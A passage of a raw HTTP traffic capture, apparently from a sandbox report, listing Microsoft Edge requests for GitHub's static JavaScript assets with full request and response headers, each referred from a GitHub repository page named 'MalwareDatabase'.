x-served-by: cache-iad-kcgs7200098-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 27, 6328
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 3af16b52c00615d78023f4ed1c8d3bc8e54ec8e8
content-length: 3545
-
GEThttps://github.githubassets.com/assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_modules_github_behaviors_include-467754-f9bd433e9591.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_modules_github_behaviors_include-467754-f9bd433e9591.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 22 Feb 2024 16:53:07 GMT
etag: 0x8DC33C6BE7E517F
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 85852
x-served-by: cache-iad-kcgs7200029-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 27, 6326
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: aedcf77a633a663c3363ff57f4bacf4023b47f19
content-length: 6175
-
GEThttps://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-9285faa0e011.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-9285faa0e011.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 22 Feb 2024 16:53:07 GMT
etag: 0x8DC33C6BE7816FA
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 85852
x-served-by: cache-iad-kiad7000028-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 27, 6347
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: c398c96cb046b89d2af36715283c1283976012b6
content-length: 3454
-
GEThttps://github.githubassets.com/assets/app_assets_modules_github_blob-anchor_ts-app_assets_modules_github_filter-sort_ts-app_assets_-c96432-da3733f430b8.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/app_assets_modules_github_blob-anchor_ts-app_assets_modules_github_filter-sort_ts-app_assets_-c96432-da3733f430b8.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 22 Feb 2024 16:53:07 GMT
etag: 0x8DC33C6BE777B5F
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 85852
x-served-by: cache-iad-kjyo7100155-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 27, 6393
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: c8ec4d7ba4115fddf6d5d540a8e2a191cbd1738f
content-length: 2753
-
Remote address:185.199.108.154:443RequestGET /assets/behaviors-95fb377bbf8b.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 28 Feb 2024 13:59:18 GMT
etag: 0x8DC386574F0ADD6
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 85852
x-served-by: cache-iad-kiad7000135-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 27, 6401
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: c82f858afa05863478f5108e0b75477bbb4c5277
content-length: 65122
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-d0256ebff5cd.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-d0256ebff5cd.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 22 Feb 2024 16:53:13 GMT
etag: 0x8DC33C6C201D612
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 85852
x-served-by: cache-iad-kjyo7100064-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 27, 6351
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 918675d0fa4df95a3eeaa1c2c80e261d27db6d9b
content-length: 3656
-
Remote address:185.199.108.154:443RequestGET /assets/notifications-global-352d84c6cc82.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 24 Oct 2023 17:57:34 GMT
etag: 0x8DBD4BAB3A8F911
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 4706941
x-served-by: cache-iad-kjyo7100084-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 20, 99242
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 3abe0fe27e506b21bc173f5b52ba2fa6acfb01ca
content-length: 4475
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_template-parts_lib_index_js-878844713bc9.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_template-parts_lib_index_js-878844713bc9.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Fri, 23 Feb 2024 16:22:10 GMT
etag: 0x8DC348B9604E6B9
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 85840
x-served-by: cache-iad-kcgs7200073-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 15, 3887
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 5ba28728521984f6e782510dada815a112c82d79
content-length: 7591
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-c537341-c7f6a41a084c.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-c537341-c7f6a41a084c.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 22 Feb 2024 16:53:07 GMT
etag: 0x8DC33C6BE7864C2
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 85843
x-served-by: cache-iad-kiad7000029-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 18, 4924
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 64612398ae9b827543a300c3ec89c7384839fe1c
content-length: 3648
-
GEThttps://github.githubassets.com/assets/app_assets_modules_github_ref-selector_ts-b593b93f23f5.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/app_assets_modules_github_ref-selector_ts-b593b93f23f5.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Sat, 10 Feb 2024 01:12:23 GMT
etag: 0x8DC29D5563BE733
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 1364745
x-served-by: cache-iad-kcgs7200167-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 64, 36293
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 602ce75ebbdbb5155a3e20bc63b3747a473315f5
content-length: 6289
-
Remote address:185.199.108.154:443RequestGET /assets/codespaces-1a8626dd714a.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 24 Oct 2023 17:57:36 GMT
etag: 0x8DBD4BAB47FF086
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 3296639
x-served-by: cache-iad-kiad7000116-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 103, 75471
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 104e9603fd2e34c43fd1dbc50516e60224239a75
content-length: 4295
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_mini-throt-08ab15-3e0517baca99.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_mini-throt-08ab15-3e0517baca99.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Sat, 10 Feb 2024 01:12:23 GMT
etag: 0x8DC29D5563585BD
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 1364746
x-served-by: cache-iad-kiad7000130-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 86, 42577
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: b2d44b51c5e35a70b42564fb5d4cdce2c37b049d
content-length: 6397
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_mini-th-55cf52-e14cb4b719b4.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_mini-th-55cf52-e14cb4b719b4.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Mon, 26 Feb 2024 19:17:29 GMT
etag: 0x8DC36FF93126100
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 106288
x-served-by: cache-iad-kiad7000162-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 14, 5329
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 44f8a60fe63d1c4ddd473db0d5fd20f2e9ecea6e
content-length: 9133
-
Remote address:185.199.108.154:443RequestGET /assets/repositories-69068e0899f9.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 22 Feb 2024 16:53:09 GMT
etag: 0x8DC33C6BFD75417
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 85840
x-served-by: cache-iad-kiad7000097-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 17, 4287
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: b969e741ece9130d5e8bc84a79dbeb8378bcaf58
content-length: 5887
-
Remote address:185.199.108.154:443RequestGET /assets/code-menu-614feb194539.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Fri, 23 Feb 2024 16:22:14 GMT
etag: 0x8DC348B98CE799F
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 85839
x-served-by: cache-iad-kcgs7200129-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 16, 3847
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 47646612b489506489e5f28b18c48bbe8687ffd6
content-length: 20008
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Button_IconButton_js-node_modules_primer_react_lib--23bcad-e3a267112490.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_primer_react_lib-esm_Button_IconButton_js-node_modules_primer_react_lib--23bcad-e3a267112490.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Mon, 26 Feb 2024 17:07:06 GMT
etag: 0x8DC36ED5C63604F
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 250551
x-served-by: cache-iad-kjyo7100105-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 16, 15252
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 09f48dc3f73e06acf3c0ab814eae04e645a9a8c7
content-length: 11009
-
Remote address:185.199.108.154:443RequestGET /assets/keyboard-shortcuts-dialog-bcc338063768.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 28 Feb 2024 13:59:21 GMT
etag: 0x8DC3865767EDD8A
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 85852
x-served-by: cache-iad-kiad7000083-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 27, 6298
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 02dc79a578accc637e75c1d26e400d7f2e85c15b
content-length: 11545
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-99519581d0f8.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-99519581d0f8.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 24 Oct 2023 17:57:35 GMT
etag: 0x8DBD4BAB41F03C7
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 4706942
x-served-by: cache-iad-kjyo7100068-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 22, 81024
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: e921ba6bc641defffea65ff7c7efc4e104192ad0
content-length: 5701
-
Remote address:185.199.108.154:443RequestGET /assets/sessions-585a7232e50a.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 22 Feb 2024 16:53:15 GMT
etag: 0x8DC33C6C38EA6AB
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 85749
x-served-by: cache-iad-kjyo7100175-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 48, 3863
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: d030e27d2ee7790e8f85b0e82ec517a6b7617e08
content-length: 4554
-
Remote address:185.199.108.154:443RequestGET /assets/react-lib-1fbfc5be2c18.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 24 Oct 2023 17:57:32 GMT
etag: 0x8DBD4BAB2A79ED8
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 4415755
x-served-by: cache-iad-kcgs7200091-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 2198, 105491
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 88d7fc5bf6e0ab73441de979867ca3d93df24084
content-length: 60628
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_primer_octicons-react_dist_index_esm_js-node_modules_primer_react_lib-es-2e8e7c-b299afe58dd7.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_primer_octicons-react_dist_index_esm_js-node_modules_primer_react_lib-es-2e8e7c-b299afe58dd7.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
